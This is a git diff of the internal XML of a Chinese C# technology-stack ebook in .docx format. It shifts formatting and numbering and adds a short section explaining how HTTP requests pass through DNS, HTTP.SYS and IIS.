-        <w:lastRenderedPageBreak/>
         <w:t>IP</w:t>
       </w:r>
       <w:r>
@@ -27868,6 +28182,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Authorization</w:t>
       </w:r>
       <w:r>
@@ -28861,7 +29176,6 @@
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:tab/>
       </w:r>
       <w:r>
@@ -29117,7 +29431,17 @@
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">application/x-www-form-urlencoded 和 multipart/form-data </w:t>
+        <w:t xml:space="preserve">application/x-www-form-urlencoded 和 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Courier New"/>
+          <w:color w:val="0070C0"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">multipart/form-data </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -29650,7 +29974,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>A</w:t>
       </w:r>
       <w:r>
@@ -30067,6 +30390,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>CSS Sprites</w:t>
       </w:r>
       <w:r>
@@ -31197,7 +31521,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>访问流量来源</w:t>
       </w:r>
     </w:p>
@@ -31614,6 +31937,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>App_GlobalResources</w:t>
       </w:r>
       <w:r>
@@ -32796,7 +33120,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>实现一个简单的</w:t>
       </w:r>
       <w:r>
@@ -33083,6 +33406,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>把任意长的输入消息串变化成固定长的输出串且由输出串难以得到输入串的一种函数，用于产生消息摘要，密钥加密</w:t>
       </w:r>
     </w:p>
@@ -33961,7 +34285,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>渗透注入</w:t>
       </w:r>
     </w:p>
@@ -34352,6 +34675,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>透明</w:t>
       </w:r>
       <w:r>
@@ -34984,7 +35308,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>代码管理</w:t>
       </w:r>
     </w:p>
@@ -35415,6 +35738,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>VS</w:t>
       </w:r>
       <w:r>
@@ -36127,7 +36451,6 @@
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>又叫小驼峰式命名法。 </w:t>
       </w:r>
       <w:r>
@@ -36272,7 +36595,7 @@
         </w:rPr>
         <w:t>3.帕斯卡(</w:t>
       </w:r>
-      <w:hyperlink r:id="rId30" w:tgtFrame="https://baike.baidu.com/item/%E5%B8%95%E6%96%AF%E5%8D%A1%E5%91%BD%E5%90%8D%E6%B3%95/_blank" w:history="1">
+      <w:hyperlink r:id="rId31" w:tgtFrame="https://baike.baidu.com/item/%E5%B8%95%E6%96%AF%E5%8D%A1%E5%91%BD%E5%90%8D%E6%B3%95/_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -37068,7 +37391,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>故障可弹性</w:t>
       </w:r>
     </w:p>
@@ -37236,6 +37558,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>例如：我们可以发布一个</w:t>
       </w:r>
       <w:r>
@@ -38518,7 +38841,6 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="zh-CN"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>[</w:t>
       </w:r>
       <w:r>
@@ -38960,6 +39282,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>[</w:t>
       </w:r>
       <w:r>
@@ -39753,7 +40076,6 @@
           <w:sz w:val="17"/>
           <w:szCs w:val="17"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>1.  </w:t>
       </w:r>
       <w:r>
@@ -39923,6 +40245,7 @@
           <w:sz w:val="17"/>
           <w:szCs w:val="17"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
@@ -40293,7 +40616,7 @@
         </w:rPr>
         <w:t>，网址：</w:t>
       </w:r>
-      <w:hyperlink r:id="rId31" w:tgtFrame="_blank" w:tooltip="http://www.rabbitmq.com/" w:history="1">
+      <w:hyperlink r:id="rId32" w:tgtFrame="_blank" w:tooltip="http://www.rabbitmq.com/" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -40743,7 +41066,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>最为流行的</w:t>
       </w:r>
       <w:r>
@@ -40950,6 +41272,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Quartz</w:t>
       </w:r>
     </w:p>
@@ -41578,7 +41901,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Business Process Management - BPM </w:t>
       </w:r>
       <w:r>
@@ -41815,6 +42137,7 @@
           <w:szCs w:val="31"/>
           <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>.Net常用工具及插件</w:t>
       </w:r>
     </w:p>
@@ -41877,7 +42200,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId32" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
+      <w:hyperlink r:id="rId33" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -42093,7 +42416,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId33" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
+      <w:hyperlink r:id="rId34" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -42628,6 +42951,7 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>1.12.2(</w:t>
       </w:r>
       <w:r>
@@ -42838,7 +43162,7 @@
         </w:rPr>
         <w:t>好了，访问</w:t>
       </w:r>
-      <w:hyperlink r:id="rId34" w:history="1">
+      <w:hyperlink r:id="rId35" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -49399,6 +49723,95 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="43">
+    <w:nsid w:val="5D443934"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="57E8B89E"/>
+    <w:lvl w:ilvl="0" w:tplc="1CB469AC">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="44">
     <w:nsid w:val="639186A0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="639186A0"/>
@@ -49547,7 +49960,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="44">
+  <w:abstractNum w:abstractNumId="45">
     <w:nsid w:val="64973F63"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="81066C44"/>
@@ -49696,7 +50109,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="45">
+  <w:abstractNum w:abstractNumId="46">
     <w:nsid w:val="653D1365"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="5DC48D9E"/>
@@ -49845,7 +50258,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="46">
+  <w:abstractNum w:abstractNumId="47">
     <w:nsid w:val="6A042BEB"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="6A042BEB"/>
@@ -49994,7 +50407,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="47">
+  <w:abstractNum w:abstractNumId="48">
     <w:nsid w:val="7A1CE74A"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7A1CE74A"/>
@@ -50143,7 +50556,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="48">
+  <w:abstractNum w:abstractNumId="49">
     <w:nsid w:val="7BAD69E7"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F4727B6E"/>
@@ -50233,7 +50646,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="49">
+  <w:abstractNum w:abstractNumId="50">
     <w:nsid w:val="7BC4531B"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="E1B210EE"/>
@@ -50382,7 +50795,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="50">
+  <w:abstractNum w:abstractNumId="51">
     <w:nsid w:val="7E1D9B84"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7E1D9B84"/>
@@ -50531,7 +50944,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="51">
+  <w:abstractNum w:abstractNumId="52">
     <w:nsid w:val="7FFE1E02"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7FFE1E02"/>
@@ -50690,7 +51103,7 @@
     <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="4">
-    <w:abstractNumId w:val="46"/>
+    <w:abstractNumId w:val="47"/>
   </w:num>
   <w:num w:numId="5">
     <w:abstractNumId w:val="30"/>
@@ -50705,7 +51118,7 @@
     <w:abstractNumId w:val="26"/>
   </w:num>
   <w:num w:numId="9">
-    <w:abstractNumId w:val="50"/>
+    <w:abstractNumId w:val="51"/>
   </w:num>
   <w:num w:numId="10">
     <w:abstractNumId w:val="7"/>
@@ -51701,7 +52114,7 @@
     <w:abstractNumId w:val="35"/>
   </w:num>
   <w:num w:numId="53">
-    <w:abstractNumId w:val="51"/>
+    <w:abstractNumId w:val="52"/>
   </w:num>
   <w:num w:numId="54">
     <w:abstractNumId w:val="4"/>
@@ -52742,10 +53155,10 @@
     <w:abstractNumId w:val="31"/>
   </w:num>
   <w:num w:numId="94">
-    <w:abstractNumId w:val="43"/>
+    <w:abstractNumId w:val="44"/>
   </w:num>
   <w:num w:numId="95">
-    <w:abstractNumId w:val="43"/>
+    <w:abstractNumId w:val="44"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -52775,7 +53188,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="96">
-    <w:abstractNumId w:val="43"/>
+    <w:abstractNumId w:val="44"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -54383,7 +54796,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="164">
-    <w:abstractNumId w:val="47"/>
+    <w:abstractNumId w:val="48"/>
   </w:num>
   <w:num w:numId="165">
     <w:abstractNumId w:val="32"/>
@@ -54392,19 +54805,22 @@
     <w:abstractNumId w:val="22"/>
   </w:num>
   <w:num w:numId="167">
-    <w:abstractNumId w:val="44"/>
+    <w:abstractNumId w:val="45"/>
   </w:num>
   <w:num w:numId="168">
     <w:abstractNumId w:val="41"/>
   </w:num>
   <w:num w:numId="169">
+    <w:abstractNumId w:val="50"/>
+  </w:num>
+  <w:num w:numId="170">
+    <w:abstractNumId w:val="46"/>
+  </w:num>
+  <w:num w:numId="171">
     <w:abstractNumId w:val="49"/>
   </w:num>
-  <w:num w:numId="170">
-    <w:abstractNumId w:val="45"/>
-  </w:num>
-  <w:num w:numId="171">
-    <w:abstractNumId w:val="48"/>
+  <w:num w:numId="172">
+    <w:abstractNumId w:val="43"/>
   </w:num>
   <w:numIdMacAtCleanup w:val="165"/>
 </w:numbering>
@@ -55221,7 +55637,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{17CD8282-49C5-417B-B84F-008B22D5A5ED}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{8ED3342F-AC38-4333-82F0-827EB04F78F1}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/EBook/C#技术栈.docx
+++ b/EBook/C#技术栈.docx
@@ -13356,7 +13356,6 @@
         <w:ind w:firstLineChars="50" w:firstLine="140"/>
         <w:outlineLvl w:val="2"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="0070C0"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -18010,9 +18009,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -18024,9 +18020,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -18064,9 +18057,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -18096,9 +18086,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -18116,9 +18103,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -18175,9 +18159,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -18189,17 +18170,11 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -18217,9 +18192,6 @@
           <w:numId w:val="172"/>
         </w:numPr>
         <w:ind w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -18237,9 +18209,6 @@
           <w:numId w:val="172"/>
         </w:numPr>
         <w:ind w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -18257,9 +18226,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -18319,9 +18285,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -18351,9 +18314,6 @@
           <w:numId w:val="172"/>
         </w:numPr>
         <w:ind w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -18389,9 +18349,6 @@
           <w:numId w:val="172"/>
         </w:numPr>
         <w:ind w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -18409,9 +18366,6 @@
           <w:numId w:val="172"/>
         </w:numPr>
         <w:ind w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -25283,6 +25237,9 @@
           <w:numId w:val="65"/>
         </w:numPr>
         <w:ind w:left="1800"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -25324,6 +25281,1480 @@
         </w:rPr>
         <w:t>管道模型：</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="2880"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2880"/>
+        </w:tabs>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="0070C0"/>
+          <w:spacing w:val="1"/>
+        </w:rPr>
+        <w:t>Http处理流程概述</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="2880"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>请求到服务器端的处理流程：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="174"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>用户在浏览器中输入的地址，通过DNS解析成“协议+IP+端口“，类似地址，浏览器就将请求发送到这个地址。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="174"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>有IP确定服务器，请求到达这个地址（服务器）后，再由端口确定进程，由服务器对应的进程处理，在windows server服务器是由一个名为HTTP.SYS服务来接受http请求。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="174"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>HTTP.SYS服务接受到请求后，HTTP.SYS和IIS属于两个进程，属于两个进程之间的通讯，HTTP.SYS通过pipeline（管线）方式转发给IIS。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="174"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>IIS识别不同类型的请求，然后交给不同的应用程序处理，若找不到此类型的处理程序，且请求的文件没有收到服务器保护，则IIS直接把请求的文件返回给客户端。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
